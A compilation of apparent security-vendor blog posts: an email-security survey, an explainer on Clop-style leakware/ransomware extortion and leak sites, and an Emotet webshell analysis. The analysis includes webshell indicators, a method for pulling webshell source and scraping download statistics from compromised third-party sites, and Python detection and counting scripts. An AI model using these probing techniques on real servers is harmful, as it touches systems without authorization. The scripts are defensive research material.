1 of every 4 companies suffered at least one email security breach, Hornetsecurity survey finds

Email security is one of the main topics of concern for any IT department, and for good reason. Security breaches often lead to loss of sensitive data, operation downtime, and lost revenue. So we conducted an email security survey of 420+ businesses, and found that 23% of them, or 1 in 4, reported an email-related security breach. Of these security breaches, 36% were caused by phishing attacks targeting arguably the weakest point of any security system, end users.

The survey also examined how companies operating on the Microsoft 365 platform handle email security, and whether or not they use the baked-in Microsoft 365 security tools, or resort to third-party solutions. It is important to keep in mind that the results reveal the number of security breaches that respondents were aware of, and that often potential security breaches are reported months after they occur, missed completely, or not reported at all.
Reported Email Security Breach

What’s the main cause of email security breaches?

Of the security breaches respondents reported knowing about, 36% were caused by phishing attacks specifically targeting end users. More surprising is that 62% of all reported email security breaches occurred due to user-compromised passwords and successful phishing attacks.
User Compromised PW and Phishing Attacks
This fact reconfirms what many already think to be true – that your email security functions are only as useful as the training provided to end users to use said functions correctly and responsibly.

Use of Microsoft 365 Security Features

Keeping this data in mind, we then wanted to quantify and understand what companies are doing to bolster their email security. We asked a series of questions around most of the security features currently built into Microsoft 365. More specifically, we asked whether companies are using them, and if not, why. Here’s what we found:

● 1/3 of companies do not enable Multi-Factor Authentication for all users
● More than half (55%) of those who use MFA do not use Conditional Access
● 69% of respondents do not digitally sign messages
● 58% of respondents do not use encrypted email

Do not enable MFA for users
These issues are also compounded by the fact that 57% of our respondents also mention that they do not leverage Microsoft 365 Data Loss Prevention policies and 23% of these point to a lack of knowledge about the implementation of such policies as the reason.
Leverage DataLoss Prevention Policies

68% of companies expect Microsoft 365 to keep them safe from email threats, yet 50% use third-party solutions

There seems to be a disconnect between the expectations that businesses have of Microsoft 365’s email security, and the reality: While 2 out of every 3 expect Microsoft to keep them safe from email threats, half of all respondents resort to third-party solutions to supplement email security.
MS Keeping Safe from Email Threats
MS Email Security Features Licensing

Third-Party Solutions most effective, with 82% reporting no breaches

Those that use third-party solutions reported the lowest rate of email security breaches in comparison to organizations using security packages offered by Microsoft 365. An impressive 82% of all our respondents who use third-party email security solutions reported no breaches.
82 Percent report no Security Breaches
Additionally, of those who reported paying extra for Microsoft’s Enterprise Mobility & Security E3 or E5, 48% also use third-party solutions. So while expectations of Microsoft 365’s email security are high, the reality is most companies believe it’s not enough; and the numbers back up that claim.

Which companies are the most vulnerable to email security threats?

For context, here is some geographical data about our respondents: the overwhelming majority (63.8%) hail from North America, with Europe trailing at 26.5%. The rest are split between Asia (3.5%), Africa (2.9%), Australia (1.3%), Latin America (1.3%), and the Middle East (0.5%).
74% of all security breaches reported in this survey were by companies that fell within two company size brackets: those with 201-500 employees and those with 501-1000 employees. This is likely due to a combination of factors such as budget and recruitment priorities that do not recognize digital security as a major concern at the outset.
Reported Breaches based on Company Size
Once the employee count exceeds 1,000, the incidence of an email breach decreases to 17% – probably due to reactions to previous security concerns and the ability to invest in more robust security protocols and more advanced IT infrastructure. Illustrating this point is the fact that companies with 1,001+ employees are 11% more likely to have MFA enabled for all users than those with 201-500 employees.
Here’s another interesting tidbit: North American respondents reported 5% more email security breaches than their counterparts in Europe. Yet both regions use Multi-Factor Authentication at the same rate: 68%. This could be due to the fact that US breaches tend to yield much higher payouts, so US organizations might be targeted more aggressively.

How do companies feel about storing sensitive data on Exchange Online & Microsoft 365?

MS365 and MS Exchange Security Concerns
The majority of respondents reported no concerns with storing sensitive data, but it turns out that nearly 4 of every 10 companies do not store sensitive data using the Microsoft 365 platform due to data security concerns. That percentage is not insignificant considering that platforms such as Microsoft 365 are critical to most company operations.

Cyber threats on the rise – additional security layers strongly recommended for Microsoft 365

Microsoft is considered the biggest driver of the cloud movement and Microsoft 365 has brought the world’s most-used office suite to the cloud. Both critical and sensitive files are uploaded and exchanged every day by millions of business customers in the Microsoft suite – and cybercriminals are aware of this. The risks of cyberattacks are increasing every day and more incidents are being reported by both private individuals and companies of all sizes. As the survey shows, it is not only large global operating companies that are affected but also small and medium-sized ones that are increasingly becoming the focus of hackers.

With 365 Total Protection, Hornetsecurity launched a comprehensive Security & Compliance Suite for Microsoft 365, which is specifically designed for the cloud service and integrates seamlessly with it. 365 TP is available in two versions: 365 Total Protection Business includes multiple features, such as email and data security, and thus proves to be a reliable additional protection against spam and malware attacks. Advanced features and advanced protection mechanisms are included in 365 Total Protection Enterprise. With AI-based forensic analysis mechanisms, URL malware control, and ATP sandboxing, even the latest targeted cyberattacks, such as ransomware or business email compromise, are blocked.

Furthermore, the service is characterized by its fast, 30-second onboarding process, intuitive operation, and low maintenance requirements.

Click here for more information: https://www.hornetsecurity.com/en/services/365-total-protection/

Leakware-Ransomware-Hybrid Attacks

Summary: Leakware-Ransomware Hybrids

Since December 2019, ransomware operators have been using leakware/ransomware hybrid attacks more and more often. These attacks combine the classic ransomware attack with a leakware attack. In a classic ransomware attack, the victim’s data is encrypted and is only decrypted after the victim pays a ransom fee to the ransomware operators. In a leakware attack, the data is stolen, and the victim is blackmailed with the threat that the data will be published unless the victim pays a certain fee. In a leakware/ransomware hybrid attack, the data is first stolen, then encrypted. The victim is then first asked to pay the ransom for decryption. If the victim declines to pay the ransom, the attackers threaten to release the stolen data publicly. In some cases, business partners and/or customers of the victim are also contacted and informed of the impending data release to put even more pressure on the victim.

In this article we outline how these leakware/ransomware hybrid attacks work, how they differ from classic ransomware attacks, and how you can protect yourself against them.


Background: What is Ransomware?

With the rise of cryptocurrencies, ransomware has become popular among cybercriminals. While ransomware existed before cryptocurrencies, the logistics of the ransom transfer were greatly simplified by them.

According to ID Ransomware, a free service to identify ransomware, there exist 928 different pieces of ransomware [1].

Ransomware is often distributed and deployed by other malware. A popular attack vector is email. A typical infection chain of a ransomware attack is the following:

Infection chain of email-based ransomware attack

Actors behind ransomware are financially motivated. Their ransomware encrypts the victim’s data. The attackers will only decrypt the data if the victim pays a ransom.

Ransom demands can range from a few hundred euros for decrypting a single computer, through several thousand for the computers of a small business, up to millions for large corporations and/or government entities. The largest publicly known ransom to ever be paid amounted to $4.5M. It was paid by the U.S. travel management company CWT [2].


Classic Ransomware

The interaction and information flow of a classical ransomware case is as follows:

Ransomware interaction flow



New Leakware/Ransomware Hybrid

Since December 2019, actors behind the Maze ransomware operation have been combining a previous attack known as leakware with ransomware.

In a leakware attack, data of the victim is stolen, and the attackers threaten to publish the data if the victim does not pay a ransom. Leakware is therefore the opposite of ransomware. Instead of denying the victim access to the data, access to the data is granted to everyone in case the victim does not pay.

This new leakware/ransomware hybrid scheme combines both leakware and ransomware. To this end, before encrypting the victim’s data via ransomware, the data is exfiltrated to the ransomware operators, who then threaten to publish the data if the victim refuses to pay the ransom.

In addition, some ransomware operators will contact the victim’s business partners or customers, whose data is often among the data to be published. The operators behind the Clop ransomware are notorious for doing this. This is used to further increase pressure on the victim to pay the ransom.

The interaction and information flow of the new leakware/ransomware hybrid is as follows:

Ranshameware interaction flow

The problem for the victims is that, even if they pay the ransom, there is no guarantee the leaked data will be deleted – only the promise of criminals. The leaked data could be sold in the underground economy, used in future attacks, and even used to extort the same victim again with the same data at a later point in time.


Clop Ransomware as Example

Using the Clop ransomware as an example, we outline how a leakware/ransomware hybrid attack unfolds.

The Clop ransomware is operated by a threat actor commonly referred to as TA505. Hornetsecurity has reported on these activities previously [3]. Initial access takes place via a malicious email. TA505 does big-game hunting, i.e., they specifically target large corporations with high revenues. If a recipient opens the email and follows the instructions, which in most cases involve downloading a malicious document and allowing the document to execute macros, the recipient becomes a victim. The macro code in the document then downloads a remote administration trojan (RAT). This RAT gives the attackers remote access to the victim’s computer. The RAT is then used to move laterally within the victim’s company network and gather additional information. In addition, other tools (such as those from the Cobalt Strike framework) are often deployed to obtain domain admin rights. Valuable data is then exfiltrated. From victim data which was published in the past, we know that this data usually contains the complete shared drives of the infected company. Eventually, the Clop ransomware is deployed company-wide to encrypt and incapacitate as many systems as possible so the disruption to the company is maximized.

Then, the operators of the Clop ransomware send the victim to a ransom note website hosted via a Tor hidden service. This ransom note website includes details on the ransom and how to pay it.

Clop Decryptor website

Depending on the company size and estimated revenue, the demanded ransom is often in the millions. Again, TA505 does big-game hunting, i.e., they will only target large corporations with high revenues. The ransom note website also features a timer and a threat that if the ransom is not paid in time, the price will be doubled.

To prove to the victim that files can be decrypted, the ransom note site also offers a “Trial Decryption”.

Clop Decryptor Website's Trial Decryption

The ransom note site also features a support chat. Those chats are often used to negotiate the ransom, payment rates or deadline extensions.

Clop Decryptor website's Chat support

If a victim refuses to pay or does not enter negotiations, the ransomware operators start sending out mass-email notifications to the victim’s business partners and/or customers. Here is one example of such a notification email sent out by the Clop ransomware operators:

Clop notification email

The attached list.txt file contains a list of the Windows domains and their corresponding network shares from which the Clop ransomware operators have exfiltrated data. The links in the notification email point to the subpage on the Clop’s leak site where the stolen data is shared.

The Clop ransomware leak site is titled “CL0P^_- LEAKS”. It currently lists 13 victims. Here is an example of a leaked data view:

Clop leak site



List of Leak Sites

Currently, there exist leak sites for 13 different ransomware operations. The distribution of victims among each leak site can be seen in the following plot:

Victim distribution on ransomware leak sites




With 220 victims, the leak site of the Maze ransomware is the one with the highest number of victims. Apparently, the operators behind the Maze ransomware have so many potential victims that they have formed the so-called Maze Cartel, in which they help other ransomware operations for a share of the profits.

Maze leak site

Interestingly, the Maze leak site is among the leak sites that are also accessible via the clear web and not just via a hidden service.


REvil / Sodinokibi

The second most dominant ransomware with a leak site is REvil. Their site, called “Happy Blog”, contains data from 67 victims.

REvil leak site

In June 2020, the actors behind the REvil ransomware also started to “auction” stolen data:

REvil auction

However, the auction site doesn’t contain any information on how to bid. It is likely just another mechanism to gain media attention and scare companies into paying the attackers.



With data from 59 victims, the “Doppel leaks” leak site of the DoppelPaymer ransomware comes in third place.

DoppelPaymer leak site

The site is also accessible via a clear web domain.



The “Conti News” leak site of the new Conti ransomware already has data from 43 victims. From all current available information, the Conti ransomware seems to be the successor to the notorious Ryuk ransomware.

Conti leak site

The site is also accessible via a clear web domain.

After Maze, Conti is currently the ransomware with the fastest growing victim count, sometimes increasing by up to 10 new victims per day. Here, it is worth noting that only victims who refuse to pay the ransom are published on the leak sites.



Data from 37 victims of the NetWalker ransomware has been published on their leak site titled “NetWalker Blog”.

NetWalker leak site



Mespinoza / Pysa

The Mespinoza ransomware, also known as Pysa, has titled their leak site “Pysa’s Partners”. It features data from 28 victims.

Mespinoza leak site




The leak site of the Nephilim ransomware, called “Corporate Leaks”, contains data from 16 victims.

Nephilim leak site




The leak site of the RagnarLocker ransomware is titled “RAGNAR LEAKS NEWS”. It features data from 14 victims.

RagnarLocker leak site



The leak site of the SunCrypt ransomware is simply titled “News”. However, researchers were able to contact the operators of the site and confirm that the leak site is associated with the SunCrypt ransomware. The leak site features data from 9 victims.

SunCrypt leak site




The Sekhmet ransomware leak site, titled “Sekhmet Leaks”, is only available via a clear web address. It currently features data from 8 victims.

Sekhmet leak site




In the first Avaddon campaign observed by Hornetsecurity [4], no data was exfiltrated. The campaign distributed Avaddon via the Phorpiex botnet, and the encryption of the victims was fully automated. The campaign was hence not targeted at high-value victims for which a leak would be worthwhile. However, Avaddon has since been used in different campaigns and their leak site, titled “Avaddon Info”, currently has data from 4 victims.

Avaddon leak site



A very recent leak site is the “Darkside” leak site of the Darkside ransomware. It has data from 2 victims.


MedusaLocker / AKO

The MedusaLocker ransomware also had a leak site, which at one point featured data from 7 victims.

MedusaLocker leak site

However, currently the site only contains a “coming soon” message without any published contents of victims. It seems the site is currently being restructured.



The Nemty ransomware also used to have a leak site. The site was also reachable via a clear web domain. However, the site is currently not reachable anymore.



Hornetsecurity has previously analyzed the ProLock ransomware, which also claims to “have gathered […] sensitive data” and “would share it in case [the victims] refuse to pay” [5]. However, no ProLock leak site has appeared yet.


Conclusion and Remediation

The new leakware/ransomware hybrid attacks make malware infections more dangerous to businesses than ever before. While good backups helped against classic ransomware attacks, they do not provide any protection against private and/or confidential data being forcefully leaked to the public. The broad announcement of the data leak to business partners and customers will cause further damage and loss of reputation to victims, as business partners and customers, but also competitors, get unlimited access to internal documents, such as contracts, pricing, research and development findings, etc.

In general, the only protection against these leakware/ransomware hybrid attacks is to invest in effective IT security. With regards to email, Hornetsecurity’s Spam and Malware Protection and Hornetsecurity’s Advanced Threat Protection protect against leakware/ransomware hybrid attacks using email as their initial infection vector in the same way they protect against classic ransomware attacks using this access vector: by fending off these attacks at the very beginning of the attack chain before the attackers can even obtain initial access to your systems.




The Hornetsecurity Security Lab publishes new figures: about 70% of all emails are unwanted

Around 300 billion e-mails are sent every day – the number of e-mails sent and received for private and business purposes is forecast to rise to 361.6 billion by 2024. However, not all e-mails that end up in users’ inboxes are wanted, and unwanted e-mails not only contain questionable advertising, but often also harmful attachments and links.

The experts of the Hornetsecurity Security Labs have analyzed how many e-mails are actually wanted by users and what dangers can lurk in their inboxes based on the e-mails received in the system for the year 2020 and have come to interesting results: Only 28% of the e-mails could be classified as “clean”, i.e. harmless by the Hornetsecurity filters – thus more than 70% of all addressed e-mails were unwanted by the recipient.

Which emails are already blocked in advance?

A total of 67% of incoming e-mails are blocked in advance by Hornetsecurity’s filter mechanisms: this means that these e-mails have not even been classified as harmful or unwanted due to various factors. In June 2020, the Security Lab analyzed the reasons for blocking incoming emails. Below we take a look at the most important ones. 

In first place, with almost 58%, are e-mails that could be classified as spam in advance using a real-time blackhole list.

In second place, with 12%, are emails that try to use Hornetsecurity’s mail servers as an open relay. Open relay is the process by which an email server delivers emails for which it is not responsible. For example, if example.com has an email server, it should only accept email for mustermann@example.com. An open relay server would also accept mail for other domains, such as @test.com. These open relays are often misused to send spam with fake sender addresses.

In 5.9% of the e-mails blocked by Hornetsecurity, no correct sender address could be found. This is important because cyber criminals try to hide their identity or pretend to be someone else. For example: In the case of mustermann@example.com, if the domain example.com does not exist, the email is blocked.

In 5.3% of blocked e-mails, harmful content was found. Malicious content includes attachments such as *.xls, *.doc, *.pdf that contain malware, but also links that lead to malicious or compromised web pages.

What threats are found in the emails that were not blocked in advance?

The proportion of spam, malware and other threats in the non-blocked emails is also interesting. For this evaluation, the security experts checked the total number of incoming emails minus the blocked emails.

About 10% of these analyzed e-mails were spam and about 3% were info mails. The Security Lab experts were also able to find malware in about 1% of all incoming e-mails, and just under 0.1% were even detected by Hornetsecurity’s Advanced Threat Protection. These are attacks such as CEO fraud, spearphishing, or attacks that use new types of malware, which were only detected by the Hornetsecurity ATP Sandbox and not by classic filters. Conversely, this means that more than 10% of the e-mails that are not blocked in advance contain spam or attachments and content that are harmful to the user.

Although the majority of harmful e-mails can be blocked, companies should not yet sit back and relax. Cybercriminals are constantly finding new ways to send malicious emails to users and their attacks are still often successful.

The webshells powering Emotet


The Hornetsecurity Security Lab presents details on the webshells behind the Emotet distribution operation, including insights into payload downloads and how from 2020-07-22 to 2020-07-24 Emotet payloads on Emotet download URLs were replaced with HTML code displaying GIFs. The analysis shows that the number of downloads of the malicious content behind the Emotet download URLs is significant and has been observed peaking at 50,000 downloads per hour, highlighting that Emotet emails do get clicked. The analysis further shows that compromised websites are not just compromised once but multiple times by different actors, and that cleanup efforts by the website administrators are often insufficient, leading to re-enabling of the malicious Emotet downloads.


Emotet is one of the most prolific malspam actors. They distribute their malware via malspam emails with either a malicious document attachment containing VBA macros or download links to those malicious documents. These malicious documents will then download the Emotet loader from the Emotet download URLs. These downloads are hosted on compromised websites. To this end, the actors behind Emotet use webshell malware on the compromised websites. These webshells are used to place new payloads, either malicious documents distributed via malicious links in emails, or the Emotet loader, on the compromised websites. Because compromised websites get blacklisted or the Emotet malware gets cleaned, the actors use up around 300 to 400 URLs a day.

Technical Analysis

In this analysis we take a look at the Emotet webshells.

S.A.P. webshell

If you have access to the filesystem of a website compromised by Emotet, getting the webshell used by Emotet is very simple. However, with a bit of luck, and by relying on misconfigurations in the compromised websites and on another actor in the webshell realm, anyone can obtain Emotet webshell samples without access to the compromised webservers.

First, the Emotet webshells reside in the parent directory of the directory containing the Emotet download, i.e., either an Emotet maldoc, or the Emotet loader executable download. So if the Emotet download URL is https://www.example.com/wp-includes/LYnUiE/, the webshell will usually reside in https://www.example.com/wp-includes/. However, we have also seen webshells in other directories. Next, we can hope for misconfigurations in the compromised websites and hope the directory containing the webshell is an open directory, i.e., it will list the directory contents as in the following example:

Emotet open directory

In this example, import.php is the Emotet webshell and lpyc42 is the directory that will deliver the Emotet payload. Known filenames of Emotet webshells are user.php, common.php, import.php, update.php, link.php, license.php, menu.php, image.php, options.php, tools.php, core.php, edit.php, functions.php, config.php, and wp-list.php.

Obviously, access to the webshell is protected, i.e., when requesting the import.php file, the PHP code is executed by the webserver and only its output is served. However, on some servers we observed PHP files that had been renamed by adding an additional .suspected extension to the file.

Emotet open directory with renamed webshell (just ignore all the other webshells in that directory :D)

This renaming was actually most likely done by a different malware named Vigilante Malware Cleaner. Information about Vigilante Malware Cleaner was first discovered and documented by Bruce Ediger in 2019 [VigilanteMalwareCleaner]. Existence of this renaming dates back to at least 2015. The Vigilante Malware Cleaner malware seems to compromise already compromised websites, then searches existing PHP files for suspected malware, and disables suspected malicious PHP scripts by appending .suspected to their filenames, thus excluding the files from the list of files the server will execute as PHP code. This will cause the server to serve the file contents, i.e., the PHP source code of the webshell, directly instead. Using this we can download the PHP code of the Emotet webshell. Before granting access to the webshell, the code queries a parameter f_pp, which is used to decode the webshell:

Encoded Emotet webshell

This f_pp parameter functions as a password to the webshell. Via OSINT research we found that the encoded webshell is identical to one found and decoded by another researcher in January [EmotetWebshellSamples].

To illustrate to the reader what someone logging into this webshell with the correct f_pp parameter would see, we ran the decoded PHP code on a test system:

Emotet S.A.P. v.2.1 webshell

The webshell identifies itself as S.A.P. webshell with version v.2.1. The webshell allows an attacker to search, upload, and download files. It also allows the execution of arbitrary commands. It further offers convenient tools to dump SQL databases from the server, perform network scans, and/or brute force passwords.

The fact that the decoding process relies on the f_pp parameter as password and that we found multiple instances of the identical encoded webshell code dating back to January strongly suggests that Emotet reuses passwords for their webshells.

GIF hijacking

Even though we do not have logs or other forensic artifacts of the systems in question, based on our previously outlined findings we agree with the opinion stated by other researchers that the recent incident in which Emotet downloads were replaced with HTML code displaying GIFs is a result of insufficient security of the Emotet webshells. This hypothesis is supported by the fact that Emotet seems to have changed their webshell on 2020-07-27 and the GIF hijacks stopped. But indications of new GIF hijackings emerged on 2020-07-31. This could be the time it took the GIF replacement actor to figure out the new password. However, the new GIF hijackings are not widespread, which could indicate that whatever Emotet is doing to defend itself against the GIF hijackings is working. The used GIFs can be interpreted as a statement towards the actors behind Emotet that the actors behind the GIF replacements are still watching and determined to continue the disruption of the Emotet operation:

Emotet is being watched GIF Emotet is being watched GIF

On websites compromised by Emotet later on, we also found variations of the following webshell multiple times:

Possible new Emotet webshell

We are, however, not certain this is the new Emotet webshell, and would like to point out that the webshell realm is a very crowded space. For example, we observed one webserver that had two GIF hijackings, two webshells renamed to .suspected (presumably by Vigilante Malware Cleaner), as well as a new active Emotet download, all in just one directory (other parts of the server contained even more webshells):

Emotet opendir with 2 GIF hijackings

This means the website was used as a download for Emotet not once or twice, but at least three times (2020-07-23 and 2020-07-28). The website would likely still serve Emotet payloads, but luckily its bandwidth limit was exceeded.

Emotet download stopped working due to exceeded bandwidth limit

So there is a possibility that the actors placing the GIFs are gaining access via a vulnerability of the website itself, or are even affiliated with the Vigilante Malware Cleaner malware. But we are an email security provider and hence do not have enough visibility into the website compromise landscape to make any definite statements.

Download statistics

Talking about download quotas, there is a way to externally monitor Emotet payload download statistics. Emotet uses a PHP script to collect download statistics grouped by the operating system given in the downloader’s User-Agent string. These statistics are delivered as a JSON object in a subdirectory of the Emotet payload download directory named $path . '/.' . sha1(basename($path)):

Emotet download stats

So the statistics for https://www.example.com/wp-includes/LYnUiE/ could be queried from https://www.example.com/wp-includes/LYnUiE/.a2dd7d055bb668528c29e16f789755fb3aae277b.

Going again by previously shared Emotet webshell code [EmotetWebshellSamples] the numbers correspond to Windows (4), Linux (3), Apple (2), Android (1) and unknown (0) operating systems found in the downloader’s User-Agent string:

Emotet statistic PHP code
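The on-disk traces described so far (the f_pp parameter, the .suspected renames, the listed webshell filenames, and the '.' + sha1(basename) statistics entry) can be turned into a triage check for a copy of your own webroot. The following Python sketch is an added example, not code from the original analysis or from Emotet; the finding labels, the sample tree and its file contents are constructed placeholders.

```python
import hashlib
import os
import tempfile

# Webshell filenames listed in this article. Several are also ordinary
# PHP/WordPress names, so a name match only counts beside a payload directory.
KNOWN_WEBSHELL_NAMES = {
    "user.php", "common.php", "import.php", "update.php", "link.php",
    "license.php", "menu.php", "image.php", "options.php", "tools.php",
    "core.php", "edit.php", "functions.php", "config.php", "wp-list.php",
}
PASSWORD_PARAM = b"f_pp"        # parameter the encoded webshell queries
RENAMED_SUFFIX = ".suspected"   # suffix added by Vigilante Malware Cleaner


def stats_marker(dirname):
    """Name of the statistics entry: '.' + sha1(basename(path))."""
    return "." + hashlib.sha1(dirname.encode("utf-8")).hexdigest()


def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")


def _php_name(name):
    """Strip the .suspected suffix so renamed scripts are still inspected."""
    return name[: -len(RENAMED_SUFFIX)] if name.endswith(RENAMED_SUFFIX) else name


def _mentions_param(path, limit=1 << 20):
    """True if the first `limit` bytes of the file contain the parameter name."""
    try:
        with open(path, "rb") as fh:
            return PASSWORD_PARAM in fh.read(limit)
    except OSError:
        return False


def scan_webroot(root):
    """Return sorted (finding, relative_path) tuples for a webroot copy."""
    findings = set()
    for cur, dirs, files in os.walk(root):
        # A payload directory contains an entry named after its own sha1.
        if cur != root and stats_marker(os.path.basename(cur)) in dirs + files:
            findings.add(("payload-dir", _rel(cur, root)))
            parent = os.path.dirname(cur)  # usual webshell location
            for name in os.listdir(parent):
                if _php_name(name) in KNOWN_WEBSHELL_NAMES:
                    findings.add(("known-name-beside-payload",
                                  _rel(os.path.join(parent, name), root)))
        for name in files:
            path = os.path.join(cur, name)
            if name.endswith(RENAMED_SUFFIX):
                findings.add(("suspected-rename", _rel(path, root)))
            if _php_name(name).endswith(".php") and _mentions_param(path):
                findings.add(("f_pp-script", _rel(path, root)))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample webroot with harmless placeholder contents."""
    files = {
        "index.php": "<?php echo 'home'; ?>",
        "wp-includes/functions.php": "<?php function helper() {} ?>",
        "wp-includes/import.php": "<?php $k = $_REQUEST['f_pp']; ?>",
        "wp-includes/lpyc42/index.php": "<?php /* placeholder */ ?>",
        "wp-includes/lpyc42/" + stats_marker("lpyc42"): '{"4": 17}',
        "wp-content/old.php.suspected": "<?php $k = $_REQUEST['f_pp']; ?>",
    }
    for rel_path, body in files.items():
        full = os.path.join(root, *rel_path.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_webroot(root)


if __name__ == "__main__":
    for finding, path in demo():
        print(f"{finding:28} {path}")
```

A known filename beside a payload directory (functions.php in the sample) is only a prompt for manual review; the f_pp reference and the sha1-named entry are the stronger signals.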

We proceeded to scrape these statistics. The counters are reset every time the Emotet Tier 2 servers push updated maldocs and loader executables to the compromised websites via the webshells. Hence, when a new count was higher than a previous count, we took the difference as the number of downloads happening between scrapes. But in case the count is lower than a previous count, we assume the count was reset and take the new count as the number of downloads since our last scrape. This way we also nullify stuck download statistics, i.e., download statistics that do not get reset anymore. We scraped with a frequency of 1 minute. Emotet updated the documents with a frequency of around 10 minutes. Because Emotet targets the Windows operating system, we only consider the download statistics for the Windows operating system. For 12 hours of 2020-07-29 the obtained statistics of 739 Emotet download URLs (533 of which registered active downloads in the presented time frame) can be visualized as follows:

Emotet downloads on 2020-07-29

This is a stacked plot, i.e., each URL’s download number is plotted individually but their total shows the cumulative number of all download URLs. Each different color represents a different Emotet download URL. These figures obviously include downloads by security researchers and automated security systems such as sandboxes. We also miss any downloads that happen between one of our scraping runs and Emotet resetting the download counter. However, the figures still give an interesting insight into Emotet downloads and hence the click rate of Emotet. In our observation the cumulative number of Emotet downloads peaked at 50,000 downloads per hour.
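The counter arithmetic described above (difference when a count grows, the new count when it drops, nothing when it is stuck) can be written down as follows. This is an added example, not the Security Lab's own code; the function names, the URL labels and the readings are constructed, and treating the first reading of a URL as a baseline is an assumption.

```python
from collections import defaultdict
from datetime import datetime


def interval_downloads(prev, new):
    """Downloads between two consecutive readings of one URL's counter."""
    if prev is None:
        return 0           # assumption: the first reading is only a baseline
    if new >= prev:
        return new - prev  # counter grew, or is stuck (difference 0)
    return new             # counter dropped: treated as a reset


def hourly_downloads(samples):
    """Sum the per-interval downloads of all URLs into hourly buckets.

    samples: iterable of (ISO timestamp, url, windows_counter) tuples.
    """
    last_seen = {}
    per_hour = defaultdict(int)
    for ts, url, count in sorted(samples):
        hour = datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)
        per_hour[hour.isoformat()] += interval_downloads(last_seen.get(url), count)
        last_seen[url] = count
    return dict(per_hour)


# Constructed readings (not real data): url-a is reset once, url-b is stuck.
SAMPLES = [
    ("2020-07-29T10:00:00", "url-a", 40),
    ("2020-07-29T10:01:00", "url-a", 55),
    ("2020-07-29T10:02:00", "url-a", 3),
    ("2020-07-29T11:00:00", "url-a", 9),
    ("2020-07-29T10:00:00", "url-b", 300),
    ("2020-07-29T10:01:00", "url-b", 300),
    ("2020-07-29T11:00:00", "url-b", 300),
]

if __name__ == "__main__":
    for hour, total in sorted(hourly_downloads(SAMPLES).items()):
        print(hour, total)
```

Downloads that arrive between a scrape and the following reset are lost to this calculation, which is the undercount the text mentions.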

Separating the download URLs by their served payloads (based on MIME type analysis) we can see that most downloads are for the Emotet maldoc. The Emotet loader is downloaded far less often:

Emotet downloads on 2020-07-29

If we plot the download numbers according to the time after the URL was first observed, we see that each URL’s download numbers peak within the first hour after the URL was first observed. At that time each observed Emotet URL got around 200 downloads per hour. However, URLs keep getting downloads even 12 hours after the URL was first observed. Hence, every download URL blocked or taken down is potentially one Emotet victim less, even if the blocking or takedown happens 12 hours too late.

The following line plot illustrates individual URL download performance:

Emotet downloads aligned by time URL was first observed

When the download figures for the URLs are stacked, the falloff trend can clearly be observed. After 9 hours the number of downloads drops to 1/3 of the downloads observed right after the URL was newly observed:

Emotet downloads aligned by time URL was first observed as stacked plot

We think a proportion of the initial peak can be attributed to automated security systems scanning the Emotet malspam and thus downloading the Emotet maldocs from the Emotet download URLs. This is confirmed by again separating the data into URLs serving the Emotet maldocs and URLs serving the Emotet loader:

Emotet downloads aligned by time URL was first observed

The number of downloads of the Emotet loader has a slower rise to the peak than the downloads of the Emotet maldoc, supporting our hypothesis. Further, there is no steep falloff in Emotet loader downloads.

On average the Emotet loader was downloaded at a rate of around 1500 per hour, while the Emotet maldocs were downloaded at a rate of around 7500 per hour.

Failed cleanup attempts

While monitoring the Emotet download URLs more closely, we also witnessed failed cleanup attempts multiple times. Often site administrators delete the directory containing the Emotet download. However, they miss cleaning all the webshells. The actors behind Emotet then simply regenerate the deleted files with their next payload update. We also observed Emotet using a previously compromised website again.

Other observed mistakes

Being such a large operation, it is inevitable that the actors behind Emotet make mistakes. While allowing another actor to hijack their payload downloads is one mistake, other mistakes include (but are not limited to) messing up the replacement regular expression, so we could observe download URLs delivering Emotet maldocs with broken filenames, such as InvJP0732{:REGEX:.doc, INVOICE-Q84{:REGEX:.doc, invoice-UBO7631{:REGEX:.doc, etc. We are certain the {:REGEX: part should be {:REGEX:[0-9]{3,6} (or something like that), a special syntax used by the Emotet generation processes to expand the filename based on a random but character-restricted pattern. These {:REGEX:[...] patterns have also previously leaked in attachment filenames and are part of Emotet’s automation process. Please note that depending on your browser the : in the filenames may be replaced with _ because : is not a valid filename character on the Windows operating system. Monitoring the Emotet operation very closely reveals a lot of such mistakes over time, and the insights gained can be used to strengthen our own defenses against Emotet.

Conclusion and Countermeasure

As this analysis by the Hornetsecurity Security Lab shows, Emotet is not just sent in large volume, but its malicious content is also downloaded in significantly large numbers.

On the network you should block known Emotet URLs. In case browsing to random websites is not an activity necessary to fulfill your business, you can block the domains and not just the specific URLs. This provides better protection because, as has been shown, Emotet and potentially other actors can misuse the compromised website again, either by regaining access via left-behind webshells, or by reinfecting the website via the initial access vector, e.g., a WordPress vulnerability or weak password. The block should be kept even if the Emotet download is gone, as the site may still be compromised. It is highly likely that you will never actually need to visit any of these websites at all, thus keeping the websites blocked shouldn’t cause negative effects.

Hornetsecurity’s Spam and Malware Protection, with the highest detection rates on the market, already detects and blocks Emotet emails based on known indicators. Hornetsecurity’s Advanced Threat Protection extends this protection by also detecting yet unknown threats.



HTML Phishing Asking for the Password Twice


Nothing but the same old threat? Phishing campaigns always seem to proceed by the same principle: A link or attachment placed in an email redirects to a phishing website to retrieve specific data about the recipient. However, for some users, a certain process has now become established that is designed to expose the traditional phishing tactics. Now the Hornetsecurity Security Lab has discovered a phishing scheme that is designed to circumvent this method.


The Procedure

In case of the detected phishing scheme, the entire phishing website is sent to the victim as an HTML attachment and then executed locally in the browser.
While investigating such phishing activity, the Security Lab discovered an interesting tactic in one of the phishing web forms used. In one form, the first password entered by the user is always rejected as incorrect and only the second password is accepted.

This is likely meant to work around a method that some users came up with to protect against phishing. Some users believe that phishing websites will always accept any password. Hence, you can spot a phishing website by entering a wrong password. A phishing website will accept the wrong password, while the legitimate site will reject it as incorrect. This assumption is, however, wrong and the Security Lab will outline why in this article.



Phishing via sending victims the entire HTML source of the phishing webpage as an email attachment is nothing new [1]. The general outline is that the victim receives an email with an attached HTML document.
Here we can see a recent example of such a phishing attempt against a bank:



In the email the user is told that the user profile must be updated, otherwise the services of the bank cannot be used anymore.

